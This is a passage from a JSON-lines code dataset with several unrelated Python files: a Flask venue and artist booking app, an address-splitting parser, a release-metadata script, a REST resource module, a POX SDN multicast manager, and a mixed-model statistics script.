import CORS\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\nimport config\nfrom flask_migrate import Migrate\nfrom datetime import datetime\nimport traceback\nfrom model import setup_db, db, Venue, Show, Artist, VenueGenre, ArtistGenre\nfrom constants import FUTURE, PAST\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\nCORS(app)\napp.config.from_object('config')\nsetup_db(app)\n\n# flask migrate\nmigrate = Migrate(app, db)\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n # \"start_time\": \"2019-05-21T21:30:00.000Z\"\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n\n#----------------------------------------------------------------------------#\n# Utils.\n#----------------------------------------------------------------------------#\n\ndef get_venues(venues_raw):\n \"\"\"\n Groups the venues by city,state as required by the venues page\n\n Parameters:\n venues_raw (list): list of venue objects to be transformed\n \n Returns:\n venues (list): Appropriately formatted venues, grouped by city and state\n \"\"\"\n venues = []\n try:\n #get distinct cities \n distinct_cities = set([(venue.city, venue.state) for venue in venues_raw])\n #prepare data\n for city,state in distinct_cities:\n venue_dict = {'city':city, 'state': state, 'venues':[]}\n venues_in_city = [{'id': venue.id,\\\n 'name': venue.name,\\\n 'num_upcoming_shows': len(venue.get_shows(FUTURE))}\\\n for venue in venues_raw\\\n if venue.city==city and venue.state==state]\n venue_dict['venues'] = venues_in_city\n venues.append(venue_dict)\n except Exception as e:\n raise e\n return venues\n\ndef get_artists(artists_raw):\n \"\"\"\n Formats the artists as required by the get artists endpoint\n\n Parameters:\n artists_raw (list): list of artist objects to be transformed\n \n Returns:\n artists (list): Appropriately formatted artists\n \"\"\"\n artists = []\n try:\n for artist in artists_raw:\n artists.append({\n 'id': artist.id,\n 'name': artist.name\n })\n except Exception as e:\n raise e\n return artists\n\n\ndef update_genres_venue(new_genres, venue):\n \"\"\"\n Updates genres for a venue with a new set of genres. Replaces the old genres with new \n\n Parameters:\n new_genres (list): List of new genres\n venue (Venue): Venue object that needs a genre update\n\n \"\"\"\n try:\n common_genres = [] # common between edit form and existing records \n \n # step 1: delete \n for genre in venue.genres:\n if genre.name in new_genres:\n common_genres.append(genre.name)\n else:\n db.session.delete(genre)\n\n # step 2: add new\n new_uncommon_genres = list(set(new_genres) - set(common_genres))\n for genre in new_uncommon_genres:\n vg = VenueGenre(venue_id=venue.id, name=genre)\n db.session.add(vg)\n\n except Exception as e:\n raise e\n\ndef update_genres_artist(new_genres, artist):\n \"\"\"\n Updates genres for an artist with a new set of genres. Replaces the old genres with new \n\n Parameters:\n new_genres (list): List of new genres\n artist (Artist): Artist object that needs a genre update\n\n \"\"\"\n try:\n common_genres = [] # common between edit form and existing records \n \n # step 1: delete \n for genre in artist.genres:\n if genre.name in new_genres:\n common_genres.append(genre.name)\n else:\n db.session.delete(genre)\n\n # step 2: add new\n new_uncommon_genres = list(set(new_genres) - set(common_genres))\n for genre in new_uncommon_genres:\n ag = ArtistGenre(artist_id=artist.id, name=genre)\n db.session.add(ag)\n\n except Exception as e:\n raise e\n\n\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n \"\"\"\n Get venues data\n \"\"\"\n try:\n result = Venue.query.all()\n data = get_venues(result)\n return render_template('pages/venues.html', areas=data);\n except Exception as e:\n print(\"Error occurred while fetching venues: \",e)\n print(traceback.format_exc())\n abort(500) \n \n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n \"\"\"\n Implement case-insensitive search on artists with partial string search. \n \"\"\"\n try:\n search_term = request.form.get('search_term', '')\n results = Venue.query.order_by(Venue.id).filter(Venue.name.ilike('%{}%'.format(search_term))).all()\n match_count = len(results)\n if match_count == 0:\n response = {\n \"count\": match_count,\n \"data\": []\n }\n else:\n response = {\n \"count\": len(results),\n \"data\": [{\"id\":venue.id,\\\n \"name\": venue.name,\\\n \"num_upcoming_shows\": len(venue.get_shows(FUTURE))}\\\n for venue in results]\n }\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n except Exception as e:\n print(\"Error occurred while seraching for venues: \",e)\n print(traceback.format_exc())\n abort(500)\n \n\n@app.route('/venues/')\ndef show_venue(venue_id):\n \"\"\"\n shows the venue page with the given venue_id\n \"\"\"\n \n try:\n result = Venue.query.filter_by(id=venue_id).all()\n if len(result) == 0 :\n print(\"No result for found for venue id {}\".format(venue_id))\n abort(404)\n data = result[0].format_all()\n except Exception as e:\n print(\"Error occured while fetching data for venue \", e)\n print(traceback.format_exc())\n abort(500)\n \n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n \"\"\"\n Get create venue form\n \"\"\"\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n \"\"\"\n Submit new venue form and persist\n \"\"\"\n try:\n request.get_data()\n genres = request.form.getlist('genres')\n venue_dict = request.form.to_dict()\n seeking_talent = venue_dict['seeking_talent'] == \"True\"\n venue = Venue(name=venue_dict['name'], city=venue_dict['city'], state=venue_dict['state'],\\\n address=venue_dict['address'], phone=venue_dict['phone'],\\\n facebook_link=venue_dict['facebook_link'],\\\n website_link=venue_dict['website_link'], image_link=venue_dict['image_link'],\\\n seeking_talent=seeking_talent, seeking_description=venue_dict['seeking_description'])\n venue.create(genres)\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n except Exception as e:\n print(\"Error while creating new venue: \", e)\n print(traceback.format_exc())\n flash('An error occurred. Venue ' + request.form['name'] + ' could not be listed.')\n abort(500)\n return render_template('pages/home.html')\n\n@app.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n \"\"\"\n Deletes venue from DB\n \"\"\"\n # TODO: Implement Delete Button on UI\n try:\n venue = Venue.query.get(venue_id)\n db.session.delete(venue)\n db.session.commit()\n flash('Deleted venue '+venue.name+' successfully!')\n return render_template('pages/home.html')\n except Exception as e:\n flash('Error occured while deleting venue ' + venue.name)\n print(\"Error in deleting venue:: \",e)\n print(traceback.format_exc())\n db.session.rollback()\n abort(500)\n finally:\n db.session.close() \n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n \"\"\"\n Get artists\n \"\"\"\n try:\n result = Artist.query.with_entities(Artist.id,Artist.name).all()\n if len(result) == 0:\n print(\"No results found\")\n abort(404)\n data = get_artists(result)\n return render_template('pages/artists.html', artists=data)\n except Exception as e:\n print(\"Error occured while fetching artists\", e)\n print(traceback.format_exc())\n abort(500)\n \n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n \"\"\"\n Implements case insesitive search on artists with partial string search\n \"\"\"\n try:\n search_term = request.form.get('search_term', '')\n results = Artist.query.order_by(Artist.id).filter(Artist.name.ilike('%{}%'.format(search_term))).all()\n match_count = len(results)\n if match_count == 0:\n response = {\n \"count\": match_count,\n \"data\": []\n }\n else:\n response = {\n \"count\": len(results),\n \"data\": [{\"id\":artist.id,\\\n \"name\": artist.name,\\\n \"num_upcoming_shows\": len(artist.get_shows(FUTURE))}\\\n for artist in results]\n }\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n except Exception as e:\n print(\"Error occurred while seraching for artists: \",e)\n print(traceback.format_exc())\n abort(500)\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n \"\"\"shows the venue page with the given venue_id\"\"\"\n try:\n result = Artist.query.filter_by(id=artist_id).all()\n if len(result) == 0:\n print(\"No result for found for artist id {}\".format(artist_id))\n abort(404) \n data = result[0].format_all()\n return render_template('pages/show_artist.html', artist=data)\n except Exception as e:\n print(\"Error occured while fetching artist\", e)\n print(traceback.format_exc())\n abort(500)\n \n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n \"\"\"\n Get data for edit artist page\n \"\"\"\n form = ArtistForm()\n try:\n result = Artist.query.filter_by(id=artist_id).all()\n if len(result) == 0 :\n print(\"No result for found for artist id {}\".format(artist_id))\n abort(404)\n data = result[0].format_all()\n artist = {\n \"id\": data[\"id\"],\n \"name\": data[\"name\"],\n \"genres\": data[\"genres\"],\n \"city\": data[\"city\"],\n \"state\": data[\"state\"],\n \"phone\": data[\"phone\"],\n \"website\": data[\"website\"],\n \"facebook_link\": data[\"facebook_link\"],\n \"seeking_venue\": data[\"seeking_venue\"],\n \"seeking_description\": data[\"seeking_description\"],\n \"image_link\": data[\"image_link\"]\n }\n # TODO: populate form with values from artist with ID \n return render_template('forms/edit_artist.html', form=form, artist=artist)\n except Exception as e:\n print(\"Error occured while fetching data for artist \", e)\n print(traceback.format_exc())\n abort(500)\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n \"\"\"\n Takes values from the form submitted, and updates existing\n artist record with ID using the new attributes\n \"\"\"\n try:\n # get data from request\n request.get_data()\n new_genres = request.form.getlist('genres')\n artist_dict = request.form.to_dict()\n\n # get the record to update\n artist = Artist.query.get(artist_id)\n\n # update\n artist.name = artist_dict[\"name\"]\n artist.city = artist_dict[\"city\"]\n artist.state = artist_dict[\"state\"]\n artist.phone = artist_dict[\"phone\"]\n artist.facebook_link = artist_dict[\"facebook_link\"]\n update_genres_artist(new_genres, artist)\n db.session.commit()\n flash('Artist ' + request.form['name'] + ' was successfully edited!')\n return redirect(url_for('show_artist', artist_id=artist_id))\n except Exception as e:\n print(\"Error in updating records\",e)\n db.session.rollback()\n print(traceback.format_exc())\n abort(500)\n finally:\n db.session.close()\n\n\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n \"\"\"\n Get data for edit venue page\n \"\"\"\n form = VenueForm()\n try:\n result = Venue.query.filter_by(id=venue_id).all()\n if len(result) == 0 :\n print(\"No result for found for venue id {}\".format(venue_id))\n abort(404)\n data = result[0].format_all()\n venue = {\n \"id\": data[\"id\"],\n \"name\": data[\"name\"],\n \"genres\": data[\"genres\"],\n \"address\": data[\"address\"],\n \"city\": data[\"city\"],\n \"state\": data[\"state\"],\n \"phone\": data[\"phone\"],\n \"website\": data[\"website\"],\n \"facebook_link\": data[\"facebook_link\"],\n \"seeking_talent\": data[\"seeking_talent\"],\n \"seeking_description\": data[\"seeking_description\"],\n \"image_link\": data[\"image_link\"]\n }\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n except Exception as e:\n print(\"Error occured while fetching data for venue \", e)\n print(traceback.format_exc())\n abort(500)\n\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n \"\"\"\n Takes values from the form submitted, and update existing\n venue record with ID using the new attributes\n \"\"\"\n try:\n # get data from request\n request.get_data()\n new_genres = request.form.getlist('genres')\n venue_dict = request.form.to_dict()\n\n # get the record to update\n venue = Venue.query.get(venue_id)\n\n # update\n venue.name = venue_dict[\"name\"]\n venue.city = venue_dict[\"city\"]\n venue.state = venue_dict[\"state\"]\n venue.address = venue_dict[\"address\"]\n venue.phone = venue_dict[\"phone\"]\n venue.facebook_link = venue_dict[\"facebook_link\"]\n update_genres_venue(new_genres, venue)\n db.session.commit()\n flash('Venue ' + request.form['name'] + ' was successfully edited!')\n return redirect(url_for('show_venue', venue_id=venue_id))\n except Exception as e:\n print(\"Error in updating records\",e)\n db.session.rollback()\n print(traceback.format_exc())\n abort(500)\n finally:\n db.session.close()\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n \"\"\"\n Get artist form\n \"\"\"\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n \"\"\"\n create artist on form submission\n \"\"\"\n try:\n request.get_data()\n genres = request.form.getlist('genres')\n artist_dict = request.form.to_dict()\n seeking_venue = artist_dict['seeking_venue'] == \"True\"\n artist = Artist(name=artist_dict['name'], city=artist_dict['city'], state=artist_dict['state'],\\\n phone=artist_dict['phone'],\\\n facebook_link=artist_dict['facebook_link'],\\\n website_link=artist_dict['website_link'], image_link=artist_dict['image_link'],\\\n seeking_venue=seeking_venue, seeking_description=artist_dict['seeking_description'])\n artist.create(genres)\n flash('artist ' + request.form['name'] + ' was successfully listed!')\n except Exception as e:\n print(\"Error while creating new artist: \", e)\n print(traceback.format_exc())\n flash('An error occurred. artist ' + request.form['name'] + ' could not be listed.')\n abort(500)\n\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n \"\"\"Displays list of shows at /shows\"\"\"\n shows_raw = Show.query.all()\n data = []\n try:\n for show in shows_raw:\n show_dict = show.get_show_dict()\n if show_dict:\n data.append(show_dict) \n if len(data) == 0:\n print(\"No records found for shows\")\n abort(404)\n except Exception as e:\n print(\"Error occured in fetching shows: \",e)\n print(traceback.format_exc())\n abort(500)\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n \"\"\"\n Renders shows create form\n \"\"\"\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n \"\"\"\n Called to create new shows in the db, upon submitting new show listing form\n \"\"\"\n \n try:\n request.get_data()\n show_dict = request.form.to_dict()\n show = Show(venue_id=show_dict[\"venue_id\"], artist_id=show_dict[\"artist_id\"], start_time=show_dict[\"start_time\"])\n show.create()\n flash('Show was successfully listed!')\n return render_template('pages/home.html') \n except Exception as e:\n print(\"Error in creating new show: \", e)\n print(traceback.format_exc())\n flash('An error occurred. Show could not be listed.')\n abort(500)\n \n \n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"abira125/fyyur","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42563376803","text":"\"\"\"\nsplit_parser - Split-based Parser\n\nThis module provides the SplitParser class, which is responsible for splitting an address string based on specific\nkeywords such as \",\" or custom words like \"Flat,\" \"House,\" etc. The class uses string splitting methods to extract\nrelevant information such as street names and house numbers from the address.\n\nClasses:\n SplitParser - Class for splitting address strings based on specific keywords or custom words.\n\nFunctions:\n find_next_word\n comma_split_operation\n word_split_operation\n split_operation\n\n\"\"\"\n\nimport re\n\n\nclass SplitParser:\n def find_next_word(self, word: str) -> str:\n \"\"\"\n Find the next word following a given word in the address.\n\n Parameters:\n word (str): The word to find in the address.\n\n Returns:\n str: The next word after the given word, if found; otherwise, returns None.\n \"\"\"\n pattern = r'(?<=\\b' + re.escape(word) + r'\\b)\\s+(\\w+)'\n match = re.search(pattern, self.address, re.IGNORECASE)\n if match:\n return match.group(1)\n else:\n return None\n\n def comma_split_operation(self) -> dict:\n \"\"\"\n Split the address using a comma separator and extract street and house information.\n\n Returns:\n dict: A formatted dictionary containing the extracted street and house information.\n Example: {\"street\": \"Winterallee\", \"housenumber\": \"3\"}\n \"\"\"\n address_1, address_2 = self.address.split(self.get_split_by())\n address_1, address_2 = address_1.strip(), address_2.strip()\n if address_1[0].isdigit():\n self.house_address = address_1\n self.street_address = address_2\n elif address_2[0].isdigit():\n self.house_address = address_2\n self.street_address = address_1\n else:\n return self.parse_operation()\n\n return self.format_address()\n\n def word_split_operation(self) -> dict:\n \"\"\"\n Split the address using a custom word separator and extract street and house information.\n\n Returns:\n dict: A formatted dictionary containing the extracted street and house information.\n Example: {\"street\": \"Winterallee\", \"housenumber\": \"3\"}\n \"\"\"\n house_no = self.find_next_word(self.get_split_by())\n if house_no is None:\n return self.parse_operation()\n else:\n self.house_address = f\"{self.get_split_by()} {house_no}\"\n self.street_address = self.address.replace(self.house_address, \"\").replace(\",\", \"\") \\\n .replace(self.house_address.lower(), \"\").strip()\n\n return self.format_address()\n\n def split_operation(self) -> dict:\n \"\"\"\n Perform address splitting based on the specified separator.\n\n Returns:\n dict: A formatted dictionary containing the extracted street and house information.\n \"\"\"\n if self.get_split_by() == \",\":\n return self.comma_split_operation()\n else:\n return self.word_split_operation()\n","repo_name":"Alvi-Rahman/FRIDAY_Assesment","sub_path":"parser/split_parser.py","file_name":"split_parser.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12878979322","text":"from datetime import datetime, timezone\nfrom json import load, dump\nimport os\nimport sys\n\ndest_type = sys.argv[1]\nversion = sys.argv[2]\ncommit_sha = sys.argv[3]\n\nurl_base = \"https://github.com/truchas/truchas_releases/releases/download\"\ntarball=\"truchas-%s-Linux.tar.bz2\" % version\ntarball_url = \"{url_base}/{version}/{tarball}\".format(\n url_base=url_base,\n version=version,\n tarball=tarball,\n )\n\nassert dest_type in [\"dev\", \"release\"]\nnow_utc = datetime.now(timezone.utc)\n\nfilename = \"data.json\"\nif not os.path.exists(filename):\n d = {\"data_file_version\": 1, \"dev\": [], \"release\": []}\n with open(filename, \"w\") as f:\n dump(d, f, indent=4, ensure_ascii=False, sort_keys=True)\n\nd = load(open(filename))\nassert d[\"data_file_version\"] == 1\nentry = {\n \"url\": tarball_url,\n \"filename\": tarball,\n \"version\": version,\n \"commit_sha\": commit_sha,\n \"created\": str(now_utc)\n}\nd[dest_type].append(entry)\nprint(\"Saving to %s.\" % filename)\nwith open(filename, \"w\") as f:\n dump(d, f, indent=4, ensure_ascii=False, sort_keys=True)\n","repo_name":"truchas/truchas","sub_path":"ci/tarball_update_json.py","file_name":"tarball_update_json.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"29176527168","text":"\"\"\"\n resources.models\n ~~~~~~~~~~~~~~~~\n\n Multiple models resource object with responders.\n\"\"\"\n\nimport falcon\nimport goldman\nimport goldman.signals as signals\n\nfrom ..resources.base import Resource as BaseResource\nfrom goldman.utils.responder_helpers import (\n from_rest,\n to_rest_model,\n to_rest_models,\n)\n\n\ndef on_get(resc, req, resp):\n \"\"\" Get the models identified by query parameters\n\n We return an empty list if no models are found.\n \"\"\"\n\n signals.pre_req.send(resc.model)\n signals.pre_req_search.send(resc.model)\n\n models = goldman.sess.store.search(resc.rtype, **{\n 'filters': req.filters,\n 'pages': req.pages,\n 'sorts': req.sorts,\n })\n\n props = to_rest_models(models, includes=req.includes)\n resp.serialize(props)\n\n signals.post_req.send(resc.model)\n signals.post_req_search.send(resc.model)\n\n\ndef on_post(resc, req, resp):\n \"\"\" Deserialize the payload & create the new single item \"\"\"\n\n signals.pre_req.send(resc.model)\n signals.pre_req_create.send(resc.model)\n\n props = req.deserialize()\n model = resc.model()\n\n from_rest(model, props)\n goldman.sess.store.create(model)\n\n props = to_rest_model(model, includes=req.includes)\n resp.last_modified = model.updated\n resp.location = '%s/%s' % (req.path, model.rid_value)\n resp.status = falcon.HTTP_201\n resp.serialize(props)\n\n signals.post_req.send(resc.model)\n signals.post_req_create.send(resc.model)\n\n\nclass Resource(BaseResource):\n \"\"\" Multiple items resource & responders \"\"\"\n\n DESERIALIZERS = [\n goldman.JsonApiDeserializer,\n ]\n\n SERIALIZERS = [\n goldman.CsvSerializer,\n goldman.JsonApiSerializer,\n ]\n\n def __init__(self, model, disable=None):\n\n self.model = model\n self.rondrs = [on_get, on_post]\n self.rtype = model.RTYPE\n\n super(Resource, self).__init__(disable)\n","repo_name":"sassoo/goldman","sub_path":"goldman/resources/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"30207846270","text":"from pox.core import core\nimport pox.openflow.libopenflow_01 as of\nfrom pox.lib.addresses import IPAddr\nimport pox.lib.packet as pkt\nfrom pox.lib.revent import EventHalt\n\nlog = core.getLogger()\n\nclass MulticastTrafficManager():\n def __init__(self):\n core.listen_to_dependencies(self, ['GraphBuilder','StreamerStateBuilder'])\n self.streamer_state_builder = None\n self.graph_builder = None\n self.flow_entries = {}\n \n def _handle_GraphBuilder_GraphStructureChanged(self, event):\n if self.graph_builder == None:\n self.graph_builder = event.get_graph_builder()\n \n log.info(\"Compute path invoked\")\n \n nodes = self.graph_builder.get_nodes()\n edges = self.graph_builder.get_edges()\n distances = self.graph_builder.get_distances()\n ports = self.graph_builder.get_ports()\n \n log.info(\"Nodes: \" + str(nodes))\n log.info(\"Edges: \" + str(edges))\n log.info(\"Distances: \" + str(distances))\n log.info(\"Ports: \" + str(ports))\n \n # Recompute and write out these groups\n if self.streamer_state_builder is not None:\n active_groups = self.streamer_state_builder.get_complete_groups()\n log.info(\"Flow entries before: \"+str(self.flow_entries))\n \n for group_key in active_groups.keys(): \n constructed_route = self.construct_routes(active_groups[group_key][\"members\"], active_groups[group_key][\"streamer\"])\n \n if self.flow_entries.has_key(group_key):\n self.remove_old_route(self.flow_entries[group_key], group_key)\n \n if len(constructed_route) != 0:\n self.write_route(constructed_route,group_key)\n \n self.validate_flow_entries(constructed_route,group_key)\n \n log.info(\"Flow entries after: \"+str(self.flow_entries))\n return EventHalt\n \n def _handle_StreamerStateBuilder_ActiveGroupStateChanged(self, event):\n group_key,streamer,members = event.get_group_data()\n \n log.info(\"Key:\"+str(group_key))\n log.info(\"Streamer:\"+str(streamer))\n log.info(\"Members:\"+str(members))\n \n if self.streamer_state_builder == None:\n self.streamer_state_builder = event.get_streamer_state_builder()\n \n constructed_route = self.construct_routes(members,streamer)\n log.info(\"Constructed path: \"+str(constructed_route))\n \n if self.flow_entries.has_key(group_key):\n self.remove_old_route(self.flow_entries[group_key], group_key)\n \n if len(constructed_route) != 0:\n self.write_route(constructed_route,group_key)\n \n self.validate_flow_entries(constructed_route,group_key)\n \n log.info(\"Flow entries: \"+str(self.flow_entries))\n \n def _handle_StreamerStateBuilder_ActiveGroupDeleted(self, event):\n log.info(\"Group deleted event handler in multicast\")\n log.info(\"FLow entries before: \"+str(self.flow_entries))\n if self.streamer_state_builder == None:\n self.streamer_state_builder = event.get_streamer_state_builder()\n \n group_key = event.get_group_key()\n if self.flow_entries.has_key(group_key):\n self.remove_old_route(self.flow_entries[group_key], group_key)\n self.flow_entries.pop(group_key)\n \n log.info(\"FLow entries after: \"+str(self.flow_entries))\n \n \n def _handle_StreamerStateBuilder_IncompleteGroupStateChanged(self, event):\n log.info(\"Group incomplete block/unblock event handler in multicast\")\n \n group_key,streamer,flag = event.get_group_data()\n self.send_incomplete_group_message(group_key, streamer, flag)\n \n \n def construct_routes(self, group_members, group_streamer):\n min_cost_tree = self.graph_builder.minimal_cost_spanning_tree(group_members, group_streamer)\n constructed_routes = self.graph_builder.construct_routes(min_cost_tree,group_members)\n \n log.info(\"Min cost tree: \"+str(min_cost_tree))\n \n return constructed_routes\n \n def validate_flow_entries(self, constructed_route, group_key):\n if len(constructed_route) != 0:\n if self.flow_entries.has_key(group_key):\n self.flow_entries[group_key] = constructed_route\n else:\n self.flow_entries.update({group_key:constructed_route})\n else:\n if self.flow_entries.has_key(group_key):\n self.flow_entries.pop(group_key)\n \n def remove_old_route(self, old_route, group_key):\n for node in old_route.keys():\n msg = of.ofp_flow_mod()\n msg.priority = 65535\n msg.command = of.OFPFC_DELETE\n msg.match.dl_type = 0x800\n msg.match.nw_dst = IPAddr(group_key[0])\n msg.match.nw_src = IPAddr(group_key[1])\n try:\n core.openflow.getConnection(node).send(msg)\n except AttributeError:\n log.info(\"Core is going down, can't post update for this node\")\n \n def write_route(self, constructed_route, group_key):\n for node in constructed_route.keys():\n msg = of.ofp_flow_mod()\n msg.priority = 65535\n msg.match.dl_type = 0x800\n msg.match.nw_dst = IPAddr(group_key[0])\n msg.match.nw_src = IPAddr(group_key[1])\n for out_port in constructed_route[node]:\n msg.actions.append(of.ofp_action_output(port = out_port))\n try:\n core.openflow.getConnection(node).send(msg)\n except AttributeError:\n log.info(\"Core is going down, can't post update for this node\") \n \n def send_incomplete_group_message(self,group_key,streamer,flag):\n msg = of.ofp_flow_mod()\n msg.priority = 65535\n msg.match.dl_type = 0x800\n if flag == 'UNBLOCK':\n msg.command = of.OFPFC_DELETE\n msg.match.nw_dst = IPAddr(group_key[0])\n msg.match.nw_src = IPAddr(group_key[1])\n msg.actions = []\n try:\n log.info(\"Incomplete group message sent out with flag \"+str(flag))\n core.openflow.getConnection(streamer).send(msg)\n except AttributeError:\n log.info(\"Core is going down, can't post update for this node\")\n\ndef launch():\n multicast_traffic_manager = MulticastTrafficManager()\n core.register(\"MulticastTrafficManager\", multicast_traffic_manager)\n","repo_name":"matyi25/multicast_sdn_thesis","sub_path":"multicast_traffic_manager.py","file_name":"multicast_traffic_manager.py","file_ext":"py","file_size_in_byte":6695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23563836860","text":"from scipy.integrate import quad\nimport matplotlib.pyplot as plt\nimport scipy.stats\nimport numpy as np\nimport pandas as pd\nimport patsy\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom statsmodels.tools.sm_exceptions import ConvergenceWarning\n\n### Construction du graphique des deux gaussiennes\n\nx_min = -5.0\nx_max = 10\n\nmean = 0 \nstd = 1.0\n\nmean2 = 1.0\nstd2 = 2.0\n\nx = np.linspace(x_min, x_max, 100)\n\ny1 = scipy.stats.norm.pdf(x,mean,std)\ny2 = scipy.stats.norm.pdf(x,mean2,std2)\n\nplt.plot(x,y1, color='coral', label = 'distribution normale centrée réduite')\nplt.plot(x,y2, color='blue', label = 'distribution avec des estimateurs biaisés')\n\nplt.grid()\n\nplt.xlim(x_min,x_max)\nplt.ylim(0,0.5)\n\nplt.title('Comparaison de deux gaussiennes',fontsize=10)\n\nplt.legend()\n\nplt.xlabel('x')\nplt.ylabel('Densité')\n\nplt.savefig(\"normal_distribution.png\")\n\n### Création du jeu de données proposé dans l'article \n\ndata = np.array([[0, 10, 1], [1, 25, 1], [0, 3, 2], [1, 6, 2]])\ndf = pd.DataFrame(data, columns = ['Treat', 'Resp', 'Ind'])\n\n### représentation graphique du jeu de données proposé dans l'article \n\nplt.style.use('ggplot')\nplt.scatter(df.Treat, df.Resp, c=df.Ind)\nplt.plot(df.Treat.iloc[0:2], df.Resp.iloc[0:2], '-', c='purple', label = '1')\nplt.plot(df.Treat[2:4], df.Resp.iloc[2:4], '-', c='yellow', label='2')\nplt.xlabel('Treat')\nplt.ylabel('Resp')\nplt.legend(title = 'Ind')\nplt.savefig(\"points.png\")\n\n### modèle linéaire par régression des moindres carrés (OLS)\n\nresults_ols = smf.ols('Resp ~ Treat', data=df).fit()\nresults_ols.summary()\n\n# Le maximum de vraisemblance vaut -13.549\n# beta1 = 6.5 \n# beta2 = 6.5 + 9 = 15.5\n\n\n### Modèle Linéaire mixte par ML\n\nmodel_mixte_ml = smf.mixedlm(\"Resp ~ Treat\", df, groups = df['Ind'])\nresult_ml = model_mixte_ml.fit(reml=False)\nprint(result_ml.summary())\n\n# Le maximum de vraisemblance vaut -13.0029\n# on trouve les mêmes valeurs de beta\n# de plus on note que sigma^2 = sqrt(18) = 4.24\n# sigma^2_s = sqrt(33.25) = 5.77\n\n\n### Modèle linéaire mixte par REML\n\nmodel_mixte_reml = smf.mixedlm('Resp ~ Treat', data=df, groups = df['Ind'])\nresult_reml = model_mixte_reml.fit()\nresult_reml.summary()\n\n# Le maximum de vraisemblance vaut -7.8877\n# la différence entre les deux vraisemblances est expliquée dans le rapport\n# on trouve les mêmes valeurs de beta\n# de plus on note que sigma^2 = sqrt(36) = 6\n# sigma^2_s = sqrt(66.5) = 8.15\n\n\n### Calcul de la log-vraisemblance\n\ndef f(x):\n sigma = x[0]\n sigmas = x[1]\n beta1 = 6.5\n beta2 = 15.5\n y11 = 3\n y12 = 10\n y21 = 6\n y22 = 25\n return(-(1/2)*np.log(4*sigmas**4*sigma**4 +\n 4*sigmas**2*sigma**6 + sigma**8) -(1/2)*np.log(4/((sigma**2)*(sigma**2+2*sigmas**2)))- \n (1/2)*(1/((sigma**2)*(sigma**2+2*sigmas**2)))*(((y11-beta1)**2)*(sigma**2+sigmas**2) - \n 2*(y11-beta1)*(y21-beta2)*(sigmas**2) + \n ((y21-beta2)**2)*(sigma**2+sigmas**2) + \n ((y12-beta1)**2)*(sigma**2+sigmas**2) - \n 2*(y12-beta1)*(y22-beta2)*(sigmas**2) + \n ((y22-beta2)**2)*(sigma**2+sigmas**2)))\n\n### Maximisation de la log-vraisemblance\n\nsigma_chap=0 # on initialise \\hat{\\sigma^2}\nsigma_s_chap=0 # on initialise 